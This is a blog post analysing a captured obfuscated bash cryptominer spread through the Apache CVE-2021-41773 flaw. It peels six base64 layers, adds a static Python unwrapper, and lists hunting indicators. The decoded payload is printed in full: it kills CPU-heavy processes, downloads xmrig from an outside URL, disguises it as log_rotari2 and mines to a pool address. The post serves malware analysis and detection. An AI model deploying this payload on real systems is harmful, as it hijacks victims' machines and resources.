Analysis of a captured cryptomining script

(1) Description

Recently I captured a new sample that exploits the Apache 2.4.49 vulnerability (CVE-2021-41773) to spread the xmrig-6.14.1-linux-static-x64 miner. The sample file is named aaa, and the file command identifies it as an ASCII script.

Running cat on the file directly shows its contents.

(2) Sample analysis

I. The bash script is obfuscated. Replacing eval with print lets us debug the script instead of executing it.

The first run produces:
bash -c "$(base64 -d <<< "\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")" bash "$@"

II. Extract the base64 from it, remove the line breaks, decode the base64 and run again, which produces:

bash -c "$(base64 -d <<< "\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")" bash "$@"

III. Extract the base64 from it, remove the line breaks, decode the base64 and run again, which produces:

bash -c "$(base64 -d <<< "\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")" bash "$@"

IV. Extract the base64 from it, remove the line breaks, decode the base64 and run again, which produces:

bash -c "$(base64 -d <<< "\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")" bash "$@"

V. Extract the base64 from it, remove the line breaks, decode the base64 and run again, which produces:

bash -c "$(base64 -d <<< "\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")" bash "$@"

VI. Extract the base64 from it, remove the line breaks, decode the base64 and run again, which finally produces:

#!/bin/sh
ps aux | grep -vw log_rotari2 | awk '{if($3>40.0) print $2}' > /tmp/proc && while read procid; do kill -9 $procid; done < /tmp/proc
ps -fe | grep -w log_rotari2 | grep -v grep
if [ $? -eq 0 ]
then
pwd
else
ulimit -n 65535
curl --resolve github.com:443:140.82.121.4 -o /tmp/log_rotari2.tar.gz -L https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-static-x64.tar.gz 
cd /tmp
tar xvfz log_rotari2.tar.gz
cd xmrig-6.14.1
mv xmrig log_rotari2
chmod 777 log_rotari2
./log_rotari2 --coin monero -o 141.105.65.108:3333 -u linux -p linux --nicehash --donate-level=0 --cpu-priority=5  -k -B >/dev/null &
sleep 1000
rm -rf /tmp/xmrig-6.14.1
rm -rf /tmp/log_rotari2.tar.gz
fi
echo "runing....."

VII. After six rounds of base64 decoding in total we obtain the plaintext commands. Inspecting them shows that the script downloads the miner from https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-static-x64.tar.gz and connects to 141.105.65.108:3333.
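As an added example (not part of the original post), the following Python helper performs steps I to VI statically: it peels nested `bash -c "$(base64 -d <<< ...)"` layers without executing anything, and strips the line breaks inside the base64 that step II mentions. The three-layer sample it unwraps is constructed here, not the captured file.

```python
import base64
import re

# One obfuscation layer, as seen in the sample:
#   bash -c "$(base64 -d <<< "<base64, possibly line-wrapped>")" bash "$@"
LAYER_RE = re.compile(
    r'bash -c "\$\(base64 -d <<< "\\?([A-Za-z0-9+/=\s]+?)"\)" bash "\$@"'
)


def peel_layer(text):
    """Decode one wrapper layer; return None when `text` is not such a wrapper."""
    m = LAYER_RE.search(text)
    if not m:
        return None
    b64 = re.sub(r"\s+", "", m.group(1))  # strip the newlines that break `base64 -d`
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", errors="replace")
    except ValueError:
        return None


def unwrap(text, max_layers=20):
    """Peel nested layers until a plain script remains. Returns (script, layers)."""
    layers = 0
    while layers < max_layers:
        inner = peel_layer(text)
        if inner is None:
            break
        text, layers = inner, layers + 1
    return text, layers


def wrap(script):
    """Build one wrapper layer around `script`, wrapping the base64 at 76 columns."""
    b64 = base64.b64encode(script.encode()).decode()
    wrapped = "\n".join(b64[i:i + 76] for i in range(0, len(b64), 76))
    return f'bash -c "$(base64 -d <<< "{wrapped}")" bash "$@"'


# Constructed sample (not the captured file): a harmless script wrapped three times.
INNER = '#!/bin/sh\necho "runing....."\n'
SAMPLE = wrap(wrap(wrap(INNER)))

if __name__ == "__main__":
    script, n = unwrap(SAMPLE)
    print(f"peeled {n} layers:\n{script}")
```

When hunting for this sample on a host, note that the decoded script also kills any process above 40% CPU and hides the binary as log_rotari2 under /tmp, so those artifacts are worth checking alongside the pool address.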

posted @ 2021-11-01 16:35 r1ch4rd_L